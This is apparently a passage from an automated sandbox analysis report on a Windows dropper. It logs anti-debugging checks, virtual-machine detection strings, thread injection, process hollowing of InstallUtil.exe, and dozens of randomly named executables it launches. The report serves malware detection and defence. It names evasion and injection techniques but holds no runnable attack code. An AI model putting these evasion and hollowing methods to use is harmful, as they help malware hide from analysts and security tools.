nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeAPI call chain: ExitProcess graph end nodegraph_14-6770
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeAPI call chain: ExitProcess graph end nodegraph_16-3625
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeAPI call chain: ExitProcess graph end nodegraph_17-18928
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeAPI call chain: ExitProcess graph end nodegraph_17-19892
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSystem information queried: ModuleInformation
                    Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation

                    Anti Debugging

                    barindex
                    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeSystem information queried: CodeIntegrityInformation
                    Found API chain indicative of debugger detection
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_17-18457
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeProcess queried: DebugPort
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009C5398 _memset,IsDebuggerPresent,17_2_009C5398
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009D07BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,17_2_009D07BE
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004502C0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_00415DC0 mov eax, dword ptr fs:[00000030h]22_2_00415DC0
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_00652E03 push dword ptr fs:[00000030h]22_2_00652E03
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_008D6027 mov eax, dword ptr fs:[00000030h]22_2_008D6027
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_008C0D90 mov eax, dword ptr fs:[00000030h]22_2_008C0D90
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_008C092B mov eax, dword ptr fs:[00000030h]22_2_008C092B
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009B69CB RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,17_2_009B69CB
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: 17_2_009C9B28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_009C9B28
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_00419DC7 SetUnhandledExceptionFilter,22_2_00419DC7
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00417B4E
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_004173DD
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,22_2_61EAF900
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 22_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,22_2_61EAF8FC
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeThread created: unknown EIP: 30019A0
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeThread created: unknown EIP: 30619A0
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: NULL target: unknown protection: read write
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeSection loaded: NULL target: unknown protection: execute and read
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeSection loaded: NULL target: unknown protection: read write
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeSection loaded: NULL target: unknown protection: execute and read
                    Sample uses process hollowing technique
                    Source: C:\Users\user\Desktop\file.exeSection unmapped: unknown base address: 400000Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1085008Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,15_2_00478504
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe "C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe "C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe "C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe "C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe "C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe "C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe "C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe "C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe "C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe "C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe "C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe "C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe "C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe "C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe "C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe c:\users\user\pictures\7odvnhyi6ubwlrbalo6wunsw.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe c:\users\user\pictures\7odvnhyi6ubwlrbalo6wunsw.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,15_2_0042E09C
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: k..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                    Source: BroomSetup.exe, 0000001B.00000002.3339978515.000000000041C000.00000040.00000001.01000000.00000019.sdmpBinary or memory string: Shell_TrayWndSVW
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmpBinary or memory string: ..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct interface...\..\opera\desktop\windows\installer\common\pin_automator.ccDoneCannot get native menu handle.Cannot get desktop rect.Cannot find pin menu element.No rectangleCould not activate the menu item.ProgmanSysListView324
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmpBinary or memory string: f..\..\opera\desktop\chrome_imports\chrome\browser\win\ui_automation_util.ccGetCachedBstrValue property is not a BSTR: GetCachedInt32Value property is not an I4: X64Cannot get the size of file version infoNo file version in the package\StringFileInfo\000004B0\ProductVersionNo product version value in the packageReceived an invalid version: \StringFileInfo\000004B0\ContinuousVersionReceived an invalid continuous build number: Cannot acquire internal version from the full version: \StringFileInfo\000004B0\StreamNo stream value in the packageCannot get exe output: version..\..\opera\desktop\windows\installer\common\file_version_utils_impl.ccInvalid version from exe: Cannot get exe output: streamCannot get app output Failed to run the elevated process: Failed wait for the elevated process: Unexpected result when waiting for elevated process: Shortcut element - no correct 